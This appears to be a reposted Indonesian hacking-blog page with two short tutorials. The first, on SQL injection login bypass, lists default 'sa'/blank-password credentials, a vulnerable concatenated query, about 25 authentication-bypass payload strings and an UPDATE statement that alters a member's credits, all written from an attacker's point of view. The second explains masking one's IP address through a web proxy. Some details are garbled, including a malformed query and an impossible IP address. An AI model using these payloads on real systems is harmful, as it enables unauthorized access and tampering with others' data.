SQL Injection

Keuntungan yg diambil dari trik ini adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.
Default setting dari SQL adalah :

adminID = sa
password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password=''%20 artinya menggantikan "jarak spasi" Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com

from : http://jambihackerlink.tk/
Judul asli : Konsep dasar SQL Injection

Mengalihkan IP address saat browsing

Setiap kali kita brows pada suatu web tertentu maka IP addres kompi kita akan selalu tercatat oleh server atau admin tertentu, misalnya 202.65.3118.67. nomor-nomor ini menunjukan posisi, lokasi bahkan indentitas server kita saat brows.
Artinya kita sedang atau dapat dipantau oleh server web yang kita kunjungi...berikut adalah salah satu web yang dapat kita gunakan agar IP kita dapat dilencengkan adalah dengan http://www.anonymouse.org,Cara penggunaannya adalah:
  1. kunjungi http://www.anonymouse.org
  2. sekarang tinggal menambahkan alamat website yang akan dikunjungi misalnya http://anonymouse.org/cgi-bin/anon-www.cgi/[url target]
  3. contoh ketika anda mengunjungi nyon-nyos.blogspot.com dengan web proxyhttp://anonymouse.org/cgi-bin/anon-www.cgi/www.nyon-nyos.blogspot.com
Lihat IP anda sekarang maka akan berubah dengan IP lain..namun kelemahan cara ini adalah untuk load akan memakan waktu yang lama


Dikutip dari: o-om.blogspot.com